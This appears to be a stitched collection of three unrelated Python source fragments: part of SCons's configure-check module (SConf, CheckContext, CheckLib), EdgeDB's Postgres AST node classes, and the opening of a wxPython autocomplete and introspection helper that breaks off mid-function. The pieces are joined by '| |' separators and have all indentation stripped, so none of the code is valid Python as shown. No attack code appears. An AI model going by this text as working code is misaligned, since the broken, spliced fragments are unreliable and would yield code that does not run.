"""Compiles and runs the program given in text, using extension
as file extension (e.g. '.c'). Returns (1, outputStr) on success,
(0, '') otherwise. The target (a file containing the program's stdout)
is saved in self.lastTarget (for further processing).
"""
ok = self.TryLink(text, extension)
if( ok ):
prog = self.lastTarget
pname = prog.path
output = self.confdir.File(os.path.basename(pname)+'.out')
node = self.env.Command(output, prog, [ [ pname, ">", "${TARGET}"] ])
ok = self.BuildNodes(node)
if ok:
outputStr = output.get_contents()
return( 1, outputStr)
return (0, "")
class TestWrapper(object):
"""A wrapper around Tests (to ensure sanity)"""
def __init__(self, test, sconf):
self.test = test
self.sconf = sconf
def __call__(self, *args, **kw):
if not self.sconf.active:
raise SCons.Errors.UserError
context = CheckContext(self.sconf)
ret = self.test(context, *args, **kw)
if self.sconf.config_h is not None:
self.sconf.config_h_text = self.sconf.config_h_text + context.config_h
context.Result("error: no result")
return ret
def AddTest(self, test_name, test_instance):
"""Adds test_class to this SConf instance. It can be called with
self.test_name(...)"""
setattr(self, test_name, SConfBase.TestWrapper(test_instance, self))
def AddTests(self, tests):
"""Adds all the tests given in the tests dictionary to this SConf
instance
"""
for name in tests.keys():
self.AddTest(name, tests[name])
def _createDir( self, node ):
dirName = str(node)
if dryrun:
if not os.path.isdir( dirName ):
raise ConfigureDryRunError(dirName)
else:
if not os.path.isdir( dirName ):
os.makedirs( dirName )
node._exists = 1
def _startup(self):
"""Private method. Set up logstream, and set the environment
variables necessary for a piped build
"""
global _ac_config_logs
global sconf_global
global SConfFS
self.lastEnvFs = self.env.fs
self.env.fs = SConfFS
self._createDir(self.confdir)
self.confdir.up().add_ignore( [self.confdir] )
if self.logfile is not None and not dryrun:
# truncate logfile, if SConf.Configure is called for the first time
# in a build
if self.logfile in _ac_config_logs:
log_mode = "a"
else:
_ac_config_logs[self.logfile] = None
log_mode = "w"
fp = open(str(self.logfile), log_mode)
self.logstream = SCons.Util.Unbuffered(fp)
# logfile may stay in a build directory, so we tell
# the build system not to override it with a eventually
# existing file with the same name in the source directory
self.logfile.dir.add_ignore( [self.logfile] )
tb = traceback.extract_stack()[-3-self.depth]
old_fs_dir = SConfFS.getcwd()
SConfFS.chdir(SConfFS.Top, change_os_dir=0)
self.logstream.write('file %s,line %d:\n\tConfigure(confdir = %s)\n' %
(tb[0], tb[1], str(self.confdir)) )
SConfFS.chdir(old_fs_dir)
else:
self.logstream = None
# we use a special builder to create source files from TEXT
action = SCons.Action.Action(_createSource,
_stringSource)
sconfSrcBld = SCons.Builder.Builder(action=action)
self.env.Append( BUILDERS={'SConfSourceBuilder':sconfSrcBld} )
self.config_h_text = _ac_config_hs.get(self.config_h, "")
self.active = 1
# only one SConf instance should be active at a time ...
sconf_global = self
def _shutdown(self):
"""Private method. Reset to non-piped spawn"""
global sconf_global, _ac_config_hs
if not self.active:
raise SCons.Errors.UserError("Finish may be called only once!")
if self.logstream is not None and not dryrun:
self.logstream.write("\n")
self.logstream.close()
self.logstream = None
# remove the SConfSourceBuilder from the environment
blds = self.env['BUILDERS']
del blds['SConfSourceBuilder']
self.env.Replace( BUILDERS=blds )
self.active = 0
sconf_global = None
if not self.config_h is None:
_ac_config_hs[self.config_h] = self.config_h_text
self.env.fs = self.lastEnvFs
class CheckContext(object):
"""Provides a context for configure tests. Defines how a test writes to the
screen and log file.
A typical test is just a callable with an instance of CheckContext as
first argument:
def CheckCustom(context, ...)
context.Message('Checking my weird test ... ')
ret = myWeirdTestFunction(...)
context.Result(ret)
Often, myWeirdTestFunction will be one of
context.TryCompile/context.TryLink/context.TryRun. The results of
those are cached, for they are only rebuild, if the dependencies have
changed.
"""
def __init__(self, sconf):
"""Constructor. Pass the corresponding SConf instance."""
self.sconf = sconf
self.did_show_result = 0
# for Conftest.py:
self.vardict = {}
self.havedict = {}
self.headerfilename = None
self.config_h = "" # config_h text will be stored here
# we don't regenerate the config.h file after each test. That means,
# that tests won't be able to include the config.h file, and so
# they can't do an #ifdef HAVE_XXX_H. This shouldn't be a major
# issue, though. If it turns out, that we need to include config.h
# in tests, we must ensure, that the dependencies are worked out
# correctly. Note that we can't use Conftest.py's support for config.h,
# cause we will need to specify a builder for the config.h file ...
def Message(self, text):
"""Inform about what we are doing right now, e.g.
'Checking for SOMETHING ... '
"""
self.Display(text)
self.sconf.cached = 1
self.did_show_result = 0
def Result(self, res):
"""Inform about the result of the test. res may be an integer or a
string. In case of an integer, the written text will be 'yes' or 'no'.
The result is only displayed when self.did_show_result is not set.
"""
if isinstance(res, (int, bool)):
if res:
text = "yes"
else:
text = "no"
elif isinstance(res, str):
text = res
else:
raise TypeError("Expected string, int or bool, got " + str(type(res)))
if self.did_show_result == 0:
# Didn't show result yet, do it now.
self.Display(text + "\n")
self.did_show_result = 1
def TryBuild(self, *args, **kw):
return self.sconf.TryBuild(*args, **kw)
def TryAction(self, *args, **kw):
return self.sconf.TryAction(*args, **kw)
def TryCompile(self, *args, **kw):
return self.sconf.TryCompile(*args, **kw)
def TryLink(self, *args, **kw):
return self.sconf.TryLink(*args, **kw)
def TryRun(self, *args, **kw):
return self.sconf.TryRun(*args, **kw)
def __getattr__( self, attr ):
if( attr == 'env' ):
return self.sconf.env
elif( attr == 'lastTarget' ):
return self.sconf.lastTarget
else:
raise AttributeError("CheckContext instance has no attribute '%s'" % attr)
#### Stuff used by Conftest.py (look there for explanations).
def BuildProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.Program, text, ext)
def CompileProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.Object, text, ext)
def CompileSharedObject(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $SHCC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.SharedObject, text, ext)
def RunProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
st, out = self.TryRun(text, ext)
return not st, out
def AppendLIBS(self, lib_name_list):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Append(LIBS = lib_name_list)
return oldLIBS
def PrependLIBS(self, lib_name_list):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Prepend(LIBS = lib_name_list)
return oldLIBS
def SetLIBS(self, val):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Replace(LIBS = val)
return oldLIBS
def Display(self, msg):
if self.sconf.cached:
# We assume that Display is called twice for each test here
# once for the Checking for ... message and once for the result.
# The self.sconf.cached flag can only be set between those calls
msg = "(cached) " + msg
self.sconf.cached = 0
progress_display(msg, append_newline=0)
self.Log("scons: Configure: " + msg + "\n")
def Log(self, msg):
if self.sconf.logstream is not None:
self.sconf.logstream.write(msg)
#### End of stuff used by Conftest.py.
def SConf(*args, **kw):
if kw.get(build_type, True):
kw['_depth'] = kw.get('_depth', 0) + 1
for bt in build_types:
try:
del kw[bt]
except KeyError:
pass
return SConfBase(*args, **kw)
else:
return SCons.Util.Null()
def CheckFunc(context, function_name, header = None, language = None):
res = SCons.Conftest.CheckFunc(context, function_name, header = header, language = language)
context.did_show_result = 1
return not res
def CheckType(context, type_name, includes = "", language = None):
res = SCons.Conftest.CheckType(context, type_name,
header = includes, language = language)
context.did_show_result = 1
return not res
def CheckTypeSize(context, type_name, includes = "", language = None, expect = None):
res = SCons.Conftest.CheckTypeSize(context, type_name,
header = includes, language = language,
expect = expect)
context.did_show_result = 1
return res
def CheckDeclaration(context, declaration, includes = "", language = None):
res = SCons.Conftest.CheckDeclaration(context, declaration,
includes = includes,
language = language)
context.did_show_result = 1
return not res
def createIncludesFromHeaders(headers, leaveLast, include_quotes = '""'):
# used by CheckHeader and CheckLibWithHeader to produce C - #include
# statements from the specified header (list)
if not SCons.Util.is_List(headers):
headers = [headers]
l = []
if leaveLast:
lastHeader = headers[-1]
headers = headers[:-1]
else:
lastHeader = None
for s in headers:
l.append("#include %s%s%s\n"
% (include_quotes[0], s, include_quotes[1]))
return ''.join(l), lastHeader
def CheckHeader(context, header, include_quotes = '<>', language = None):
"""
A test for a C or C++ header file.
"""
prog_prefix, hdr_to_check = \
createIncludesFromHeaders(header, 1, include_quotes)
res = SCons.Conftest.CheckHeader(context, hdr_to_check, prog_prefix,
language = language,
include_quotes = include_quotes)
context.did_show_result = 1
return not res
def CheckCC(context):
res = SCons.Conftest.CheckCC(context)
context.did_show_result = 1
return not res
def CheckCXX(context):
res = SCons.Conftest.CheckCXX(context)
context.did_show_result = 1
return not res
def CheckSHCC(context):
res = SCons.Conftest.CheckSHCC(context)
context.did_show_result = 1
return not res
def CheckSHCXX(context):
res = SCons.Conftest.CheckSHCXX(context)
context.did_show_result = 1
return not res
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCHeader(context, header, include_quotes = '""'):
"""
A test for a C header file.
"""
return CheckHeader(context, header, include_quotes, language = "C")
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCXXHeader(context, header, include_quotes = '""'):
"""
A test for a C++ header file.
"""
return CheckHeader(context, header, include_quotes, language = "C++")
def CheckLib(context, library = None, symbol = "main",
header = None, language = None, autoadd = 1):
"""
A test for a library. See also CheckLibWithHeader.
Note that library may also be None to test whether the given symbol
compiles without flags.
"""
if library == []:
library = [None]
if not SCons.Util.is_List(library):
library = [library]
# ToDo: accept path for the library
res = SCons.Conftest.CheckLib(context, library, symbol, header = header,
language = language, autoadd = autoadd)
context.did_show_result = 1
return not res
# XXX
# Bram: Can only include one header and can't use #ifdef HAVE_HEADER_H.
def CheckLibWithHeader(context, libs, header, language,
call = None, autoadd = 1):
# ToDo: accept path for library. Support system header files.
"""
Another (more sophisticated) test for a library.
Checks, if library and header is available for language (may be 'C'
or 'CXX'). Call maybe be a valid expression _with_ a trailing ';'.
As in CheckLib, we support library=None, to test if the call compiles
without extra link flags.
"""
prog_prefix, dummy = \
createIncludesFromHeaders(header, 0)
if libs == []:
libs = [None]
if not SCons.Util.is_List(libs):
libs = [libs]
res = SCons.Conftest.CheckLib(context, libs, None, prog_prefix,
call = call, language = language, autoadd = autoadd)
context.did_show_result = 1
return not res
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import enum
import dataclasses
import typing
import uuid
from edb.common import ast
from edb.common import typeutils
from edb.edgeql import ast as qlast
from edb.ir import ast as irast
# The structure of the nodes mostly follows that of Postgres'
# parsenodes.h and primnodes.h, but only with fields that are
# relevant to parsing and code generation.
#
# Certain nodes have EdgeDB-specific fields used by the
# compiler.
class Base(ast.AST):
def __repr__(self):
return f'<pg.{self.__class__.__name__} at 0x{id(self):x}>'
def dump_sql(self) -> None:
from edb.common.debug import dump_sql
dump_sql(self)
class ImmutableBase(ast.ImmutableASTMixin, Base):
pass
class Alias(ImmutableBase):
"""Alias for a range variable."""
# aliased relation name
aliasname: str
# optional list of column aliases
colnames: typing.Optional[typing.List[str]] = None
class Keyword(ImmutableBase):
"""An SQL keyword that must be output without quoting."""
name: str # Keyword name
class Star(Base):
"""'*' representing all columns of a table or compound field."""
class BaseExpr(Base):
"""Any non-statement expression node that returns a value."""
__ast_meta__ = {'nullable'}
nullable: typing.Optional[bool] = None # Whether the result can be NULL.
ser_safe: bool = False # Whether the expr is serialization-safe.
def __init__(self, *, nullable: typing.Optional[bool]=None,
**kwargs) -> None:
nullable = self._is_nullable(kwargs, nullable)
super().__init__(nullable=nullable, **kwargs)
def _is_nullable(self, kwargs: typing.Dict[str, object],
nullable: typing.Optional[bool]) -> bool:
if nullable is None:
default = type(self).get_field('nullable').default
if default is not None:
nullable = default
else:
nullable = self._infer_nullability(kwargs)
return nullable
def _infer_nullability(self, kwargs: typing.Dict[str, object]) -> bool:
nullable = False
for v in kwargs.values():
if typeutils.is_container(v):
items = typing.cast(typing.Iterable, v)
nullable = all(getattr(vv, 'nullable', False) for vv in items)
elif getattr(v, 'nullable', None):
nullable = True
if nullable:
break
return nullable
class ImmutableBaseExpr(BaseExpr, ImmutableBase):
pass
class OutputVar(ImmutableBaseExpr):
"""A base class representing expression output address."""
# Whether this represents a packed array of data
is_packed_multi: bool = False
class EdgeQLPathInfo(Base):
"""A general mixin providing EdgeQL-specific metadata on certain nodes."""
# Ignore the below fields in AST visitor/transformer.
__ast_meta__ = {
'path_scope', 'path_outputs', 'path_id', 'is_distinct',
'path_id_mask', 'path_namespace',
'packed_path_outputs', 'packed_path_namespace',
}
# The path id represented by the node.
path_id: typing.Optional[irast.PathId] = None
# Whether the node represents a distinct set.
is_distinct: bool = True
# A subset of paths necessary to perform joining.
path_scope: typing.Set[irast.PathId] = ast.field(factory=set)
# Map of res target names corresponding to paths.
path_outputs: typing.Dict[
typing.Tuple[irast.PathId, str], OutputVar
] = ast.field(factory=dict)
# Map of res target names corresponding to materialized paths.
packed_path_outputs: typing.Optional[typing.Dict[
typing.Tuple[irast.PathId, str],
OutputVar,
]] = None
def get_path_outputs(self, flavor: str) -> typing.Dict[
typing.Tuple[irast.PathId, str], OutputVar]:
if flavor == 'packed':
if self.packed_path_outputs is None:
self.packed_path_outputs = {}
return self.packed_path_outputs
elif flavor == 'normal':
return self.path_outputs
else:
raise AssertionError(f'unexpected flavor "{flavor}"')
path_id_mask: typing.Set[irast.PathId] = ast.field(factory=set)
# Map of col refs corresponding to paths.
path_namespace: typing.Dict[
typing.Tuple[irast.PathId, str], BaseExpr
] = ast.field(factory=dict)
# Same, but for packed.
packed_path_namespace: typing.Optional[typing.Dict[
typing.Tuple[irast.PathId, str],
BaseExpr,
]] = None
class BaseRangeVar(ImmutableBaseExpr):
"""Range variable, used in FROM clauses."""
__ast_meta__ = {'schema_object_id', 'tag'}
# This is a hack, since there is some code that relies on not
# having an alias on a range var (to refer to a CTE directly, for
# example, while other code depends on reading the alias name out
# of range vars. This is mostly disjoint code, so we hack around it
# with an empty aliasname.
alias: Alias = Alias(aliasname='')
#: The id of the schema object this rvar represents
schema_object_id: typing.Optional[uuid.UUID] = None
#: Optional identification piece to describe what's inside the rvar
tag: typing.Optional[str] = None
def __repr__(self) -> str:
return (
f'<pg.{self.__class__.__name__} '
f'alias={self.alias.aliasname} '
f'at {id(self):#x}>'
)
class BaseRelation(EdgeQLPathInfo, BaseExpr):
name: typing.Optional[str] = None
nullable: typing.Optional[bool] = None # Whether the result can be NULL.
class Relation(BaseRelation):
"""Regular relation."""
catalogname: typing.Optional[str] = None
schemaname: typing.Optional[str] = None
class CommonTableExpr(Base):
# Query name (unqualified)
name: str
# Whether the result can be NULL.
nullable: typing.Optional[bool] = None
# Optional list of column names
aliascolnames: typing.Optional[list] = None
# The CTE query
query: Query
# True if this CTE is recursive
recursive: bool = False
# If specified, determines if CTE is [NOT] MATERIALIZED
materialized: typing.Optional[bool] = None
def __repr__(self):
return (
f'<pg.{self.__class__.__name__} '
f'name={self.name!r} at 0x{id(self):x}>'
)
class PathRangeVar(BaseRangeVar):
#: The IR TypeRef this rvar represents (if any).
typeref: typing.Optional[irast.TypeRef] = None
@property
def query(self) -> BaseRelation:
raise NotImplementedError
class RelRangeVar(PathRangeVar):
"""Relation range variable, used in FROM clauses."""
relation: typing.Union[BaseRelation, CommonTableExpr]
include_inherited: bool = True
@property
def query(self) -> BaseRelation:
if isinstance(self.relation, CommonTableExpr):
return self.relation.query
else:
return self.relation
def __repr__(self) -> str:
return (
f'<pg.{self.__class__.__name__} '
f'name={self.relation.name!r} alias={self.alias.aliasname} '
f'at {id(self):#x}>'
)
class IntersectionRangeVar(PathRangeVar):
component_rvars: typing.List[PathRangeVar]
class TypeName(ImmutableBase):
"""Type in definitions and casts."""
name: typing.Tuple[str, ...] # Type name
setof: bool = False # SET OF?
typmods: typing.Optional[list] = None # Type modifiers
array_bounds: typing.Optional[list] = None # Array bounds
class ColumnRef(OutputVar):
"""Specifies a reference to a column."""
# Column name list.
name: typing.Sequence[typing.Union[str, Star]]
# Whether the col is an optional path bond (i.e accepted when NULL)
optional: typing.Optional[bool] = None
def __repr__(self):
if hasattr(self, 'name'):
return (
f'<pg.{self.__class__.__name__} '
f'name={".".join(self.name)!r} at 0x{id(self):x}>'
)
else:
return super().__repr__()
class TupleElementBase(ImmutableBase):
path_id: irast.PathId
name: typing.Optional[typing.Union[OutputVar, str]]
def __init__(self, path_id: irast.PathId,
name: typing.Optional[typing.Union[OutputVar, str]]=None):
self.path_id = path_id
self.name = name
def __repr__(self):
return f'<{self.__class__.__name__} ' \
f'name={self.name} path_id={self.path_id}>'
class TupleElement(TupleElementBase):
val: BaseExpr
def __init__(self, path_id: irast.PathId, val: BaseExpr, *,
name: typing.Optional[typing.Union[OutputVar, str]]=None):
super().__init__(path_id, name)
self.val = val
def __repr__(self):
return f'<{self.__class__.__name__} ' \
f'name={self.name} val={self.val} path_id={self.path_id}>'
class TupleVarBase(OutputVar):
elements: typing.Sequence[TupleElementBase]
named: bool
nullable: bool
typeref: typing.Optional[irast.TypeRef]
def __init__(self, elements: typing.List[TupleElementBase], *,
named: bool=False, nullable: bool=False,
is_packed_multi: bool=False,
typeref: typing.Optional[irast.TypeRef]=None):
self.elements = elements
self.named = named
self.nullable = nullable
self.is_packed_multi = is_packed_multi
self.typeref = typeref
def __repr__(self):
return f'<{self.__class__.__name__} [{self.elements!r}]'
class TupleVar(TupleVarBase):
elements: typing.Sequence[TupleElement]
def __init__(self, elements: typing.List[TupleElement], *,
named: bool=False, nullable: bool=False,
is_packed_multi: bool=False,
typeref: typing.Optional[irast.TypeRef]=None):
self.elements = elements
self.named = named
self.nullable = nullable
self.is_packed_multi = is_packed_multi
self.typeref = typeref
class BaseParamRef(ImmutableBaseExpr):
pass
class ParamRef(BaseParamRef):
"""Query parameter ($0..$n)."""
# Number of the parameter.
number: int
class NamedParamRef(BaseParamRef):
"""Named query parameter."""
name: str
class ResTarget(ImmutableBaseExpr):
"""Query result target."""
# Column name (optional)
name: typing.Optional[str] = None
# subscripts, field names and '*'
indirection: typing.Optional[list] = None
# value expression to compute
val: BaseExpr
class UpdateTarget(ImmutableBaseExpr):
"""Query update target."""
# column name (optional)
name: str
# value expression to assign
val: BaseExpr
class InferClause(ImmutableBaseExpr):
# IndexElems to infer unique index
index_elems: typing.Optional[list] = None
# Partial-index predicate
where_clause: typing.Optional[BaseExpr] = None
# Constraint name
conname: typing.Optional[str] = None
class OnConflictClause(ImmutableBaseExpr):
action: str
infer: typing.Optional[InferClause]
target_list: typing.Optional[list] = None
where: typing.Optional[BaseExpr] = None
class ReturningQuery(BaseRelation):
target_list: typing.List[ResTarget] = ast.field(factory=list)
class NullRelation(ReturningQuery):
"""Special relation that produces nulls for all its attributes."""
where_clause: typing.Optional[BaseExpr] = None
@dataclasses.dataclass(frozen=True)
class Param:
#: postgres' variable index
index: int
#: whether parameter is required
required: bool
class Query(ReturningQuery):
"""Generic superclass representing a query."""
# Ignore the below fields in AST visitor/transformer.
__ast_meta__ = {'path_rvar_map', 'path_packed_rvar_map',
'view_path_id_map', 'argnames', 'nullable'}
view_path_id_map: typing.Dict[
irast.PathId, irast.PathId
] = ast.field(factory=dict)
# Map of RangeVars corresponding to paths.
path_rvar_map: typing.Dict[
typing.Tuple[irast.PathId, str], PathRangeVar
] = ast.field(factory=dict)
# Map of materialized RangeVars corresponding to paths.
path_packed_rvar_map: typing.Optional[typing.Dict[
typing.Tuple[irast.PathId, str],
PathRangeVar,
]] = None
argnames: typing.Optional[typing.Dict[str, Param]] = None
ctes: typing.Optional[typing.List[CommonTableExpr]] = None
def get_rvar_map(self, flavor: str) -> typing.Dict[
typing.Tuple[irast.PathId, str], PathRangeVar]:
if flavor == 'packed':
if self.path_packed_rvar_map is None:
self.path_packed_rvar_map = {}
return self.path_packed_rvar_map
elif flavor == 'normal':
return self.path_rvar_map
else:
raise AssertionError(f'unexpected flavor "{flavor}"')
def maybe_get_rvar_map(self, flavor: str) -> typing.Optional[typing.Dict[
typing.Tuple[irast.PathId, str], PathRangeVar]]:
if flavor == 'packed':
return self.path_packed_rvar_map
elif flavor == 'normal':
return self.path_rvar_map
else:
raise AssertionError(f'unexpected flavor "{flavor}"')
@property
def ser_safe(self):
return all(t.ser_safe for t in self.target_list)
def append_cte(self, cte: CommonTableExpr) -> None:
if self.ctes is None:
self.ctes = []
self.ctes.append(cte)
class DMLQuery(Query):
"""Generic superclass for INSERT/UPDATE/DELETE statements."""
# Target relation to perform the operation on.
relation: typing.Optional[PathRangeVar] = None
# List of expressions returned
returning_list: typing.List[ResTarget] = ast.field(factory=list)
@property
def target_list(self):
return self.returning_list
class InsertStmt(DMLQuery):
# (optional) list of target column names
cols: typing.Optional[typing.List[ColumnRef]] = None
# source SELECT/VALUES or None
select_stmt: typing.Optional[Query] = None
# ON CONFLICT clause
on_conflict: typing.Optional[OnConflictClause] = None
class UpdateStmt(DMLQuery):
# The UPDATE target list
targets: typing.List[UpdateTarget] = ast.field(factory=list)
# WHERE clause
where_clause: typing.Optional[BaseExpr] = None
# optional FROM clause
from_clause: typing.List[BaseRangeVar] = ast.field(factory=list)
class DeleteStmt(DMLQuery):
# WHERE clause
where_clause: typing.Optional[BaseExpr] = None
# optional USING clause
using_clause: typing.List[BaseRangeVar] = ast.field(factory=list)
class SelectStmt(Query):
# List of DISTINCT ON expressions, empty list for DISTINCT ALL
distinct_clause: typing.Optional[list] = None
# The target list
target_list: typing.List[ResTarget] = ast.field(factory=list)
# The FROM clause
from_clause: typing.List[BaseRangeVar] = ast.field(factory=list)
# The WHERE clause
where_clause: typing.Optional[BaseExpr] = None
# GROUP BY clauses
group_clause: typing.Optional[typing.List[Base]] = None
# HAVING expression
having: typing.Optional[BaseExpr] = None
# WINDOW window_name AS(...),
window_clause: typing.Optional[typing.List[Base]] = None
# List of ImplicitRow's in a VALUES query
values: typing.Optional[typing.List[Base]] = None
# ORDER BY clause
sort_clause: typing.Optional[typing.List[SortBy]] = None
# OFFSET expression
limit_offset: typing.Optional[BaseExpr] = None
# LIMIT expression
limit_count: typing.Optional[BaseExpr] = None
# FOR UPDATE clause
locking_clause: typing.Optional[list] = None
# Set operation type
op: typing.Optional[str] = None
# ALL modifier
all: bool = False
# Left operand of set op
larg: typing.Optional[Query] = None
# Right operand of set op,
rarg: typing.Optional[Query] = None
class ExprKind(enum.IntEnum):
OP = enum.auto()
class Expr(ImmutableBaseExpr):
"""Infix, prefix, and postfix expressions."""
# Operator kind
kind: ExprKind
# Possibly-qualified name of operator
name: str
# Left argument, if any
lexpr: typing.Optional[BaseExpr] = None
# Right argument, if any
rexpr: typing.Optional[BaseExpr] = None
class BaseConstant(ImmutableBaseExpr):
def __init__(self, **kwargs):
super().__init__(**kwargs)
if not isinstance(self, NullConstant) and self.val is None:
raise ValueError('cannot create a pgast.Constant without a value')
class StringConstant(BaseConstant):
"""A literal string constant."""
# Constant value
val: str
class NullConstant(BaseConstant):
"""A NULL constant."""
nullable: bool = True
class ByteaConstant(BaseConstant):
"""An bytea string."""
val: str
class NumericConstant(BaseConstant):
val: str
class BooleanConstant(BaseConstant):
val: str
class LiteralExpr(ImmutableBaseExpr):
"""A literal expression."""
# Expression text
expr: str
class TypeCast(ImmutableBaseExpr):
"""A CAST expression."""
# Expression being casted.
arg: BaseExpr
# Target type.
type_name: TypeName
class CollateClause(ImmutableBaseExpr):
"""A COLLATE expression."""
# Input expression
arg: BaseExpr
# Possibly-qualified collation name
collname: str
class VariadicArgument(ImmutableBaseExpr):
expr: BaseExpr
nullable: bool = False
class ColumnDef(ImmutableBase):
# name of column
name: str
# type of column
typename: TypeName
# default value, if any
default_expr: typing.Optional[BaseExpr] = None
# COLLATE clause, if any
coll_clause: typing.Optional[BaseExpr] = None
class FuncCall(ImmutableBaseExpr):
# Function name
name: typing.Tuple[str, ...]
# List of arguments
args: typing.List[BaseExpr]
# ORDER BY
agg_order: typing.List[SortBy]
# FILTER clause
agg_filter: BaseExpr
# Argument list is '*'
agg_star: bool
# Arguments were labeled DISTINCT
agg_distinct: bool
# OVER clause, if any
over: typing.Optional[WindowDef]
# WITH ORDINALITY
with_ordinality: bool = False
# list of ColumnDef nodes to describe result of
# the function returning RECORD.
coldeflist: typing.List[ColumnDef]
def __init__(self, *, nullable: typing.Optional[bool]=None,
null_safe: bool=False, **kwargs) -> None:
"""Function call node.
@param null_safe:
Specifies whether this function is guaranteed
to never return NULL on non-NULL input.
"""
if nullable is None and not null_safe:
nullable = True
super().__init__(nullable=nullable, **kwargs)
class NamedFuncArg(ImmutableBaseExpr):
name: str
val: BaseExpr
class Indices(ImmutableBase):
"""Array subscript or slice bounds."""
# True, if slice
is_slice: bool
# Lower bound, if any
lidx: BaseExpr
# Upper bound if any
ridx: BaseExpr
class Indirection(ImmutableBaseExpr):
"""Field and/or array element indirection."""
# Indirection subject
arg: BaseExpr
# Subscripts and/or field names and/or '*'
indirection: list
class ArrayExpr(ImmutableBaseExpr):
"""ARRAY[] construct."""
# array element expressions
elements: typing.List[BaseExpr]
class MultiAssignRef(ImmutableBase):
"""UPDATE (a, b, c) = row-valued-expr."""
# row-valued expression
source: BaseExpr
# list of columns to assign to
columns: typing.List[ColumnRef]
class SortBy(ImmutableBase):
"""ORDER BY clause element."""
# expression to sort on
node: BaseExpr
# ASC/DESC/USING/default
dir: typing.Optional[qlast.SortOrder] = None
# NULLS FIRST/LAST
nulls: typing.Optional[qlast.NonesOrder] = None
class WindowDef(ImmutableBase):
"""WINDOW and OVER clauses."""
# window name
name: typing.Optional[str] = None
# referenced window name, if any
refname: typing.Optional[str] = None
# PARTITION BY expr list
partition_clause: typing.Optional[typing.List[BaseExpr]] = None
# ORDER BY
order_clause: typing.Optional[typing.List[SortBy]] = None
# Window frame options
frame_options: typing.Optional[list] = None
# expression for starting bound, if any
start_offset: typing.Optional[BaseExpr] = None
# expression for ending ound, if any
end_offset: typing.Optional[BaseExpr] = None
class RangeSubselect(PathRangeVar):
"""Subquery appearing in FROM clauses."""
lateral: bool = False
subquery: Query
@property
def query(self):
return self.subquery
class RangeFunction(BaseRangeVar):
lateral: bool = False
# WITH ORDINALITY
with_ordinality: bool = False
# ROWS FROM form
is_rowsfrom: bool = False
functions: typing.List[FuncCall]
class JoinExpr(BaseRangeVar):
# Type of join
type: str
# Left subtree
larg: BaseExpr
# Right subtree
rarg: BaseExpr
# USING clause, if any
using_clause: typing.Optional[typing.List[BaseExpr]] = None
# Qualifiers on join, if any
quals: typing.Optional[BaseExpr] = None
def copy(self):
result = self.__class__()
result.copyfrom(self)
return result
def copyfrom(self, other):
self.larg = other.larg
self.rarg = other.rarg
self.quals = other.quals
self.type = other.type
class SubLinkType(enum.IntEnum):
EXISTS = enum.auto()
NOT_EXISTS = enum.auto()
ALL = enum.auto()
ANY = enum.auto()
class SubLink(ImmutableBaseExpr):
"""Subselect appearing in an expression."""
# Type of sublink
type: SubLinkType
# Sublink expression
expr: BaseExpr
# Sublink is never NULL
nullable: bool = False
class RowExpr(ImmutableBaseExpr):
"""A ROW() expression."""
# The fields.
args: typing.List[BaseExpr]
# Row expressions, while may contain NULLs, are not NULL themselves.
nullable: bool = False
class ImplicitRowExpr(ImmutableBaseExpr):
"""A (a, b, c) expression."""
# The fields.
args: typing.Sequence[BaseExpr]
# Row expressions, while may contain NULLs, are not NULL themselves.
nullable: bool = False
class CoalesceExpr(ImmutableBaseExpr):
"""A COALESCE() expression."""
# The arguments.
args: typing.List[Base]
class NullTest(ImmutableBaseExpr):
"""IS [NOT] NULL."""
# Input expression,
arg: BaseExpr
# NOT NULL?
negated: bool = False
# NullTest is never NULL
nullable: bool = False
class CaseWhen(ImmutableBase):
# Condition expression
expr: BaseExpr
# subsitution result
result: BaseExpr
class CaseExpr(ImmutableBaseExpr):
# Equality comparison argument
arg: typing.Optional[BaseExpr] = None
# List of WHEN clauses
args: typing.List[CaseWhen]
# ELSE clause
defresult: typing.Optional[BaseExpr] = None
SortAsc = qlast.SortAsc
SortDesc = qlast.SortDesc
SortDefault = qlast.SortDefault
NullsFirst = qlast.NonesFirst
NullsLast = qlast.NonesLast
class AlterSystem(ImmutableBaseExpr):
name: str
value: typing.Optional[BaseExpr]
class Set(ImmutableBaseExpr):
name: str
value: BaseExpr
class ConfigureDatabase(ImmutableBase):
database_name: str
parameter_name: str
value: BaseExpr
class IteratorCTE(ImmutableBase):
path_id: irast.PathId
cte: CommonTableExpr
parent: typing.Optional[IteratorCTE]
is_dml_pseudo_iterator: bool = False
| |
"""Provides a variety of introspective-type support functions for
things like call tips and command auto completion."""
__author__ = "Patrick K. O'Brien <pobrien@orbtech.com>"
__cvsid__ = "$Id$"
__revision__ = "$Revision$"[11:-2]
import cStringIO
import inspect
import sys
import tokenize
import types
import wx
def getAutoCompleteList(command='', locals=None, includeMagic=1,
includeSingle=1, includeDouble=1):
"""Return list of auto-completion options for command.
The list of options will be based on the locals namespace."""
attributes = []
# Get the proper chunk of code from the command.
root = getRoot(command, terminator='.')
try:
if locals is not None:
object = eval(root, locals)
else:
object = eval(root)
except:
pass
else:
attributes = getAttributeNames(object, includeMagic,
includeSingle, includeDouble)
return attributes
def getAttributeNames(object, includeMagic=1, includeSingle=1,
includeDouble=1):
"""Return list of unique attributes, including inherited, for object."""
attributes = []
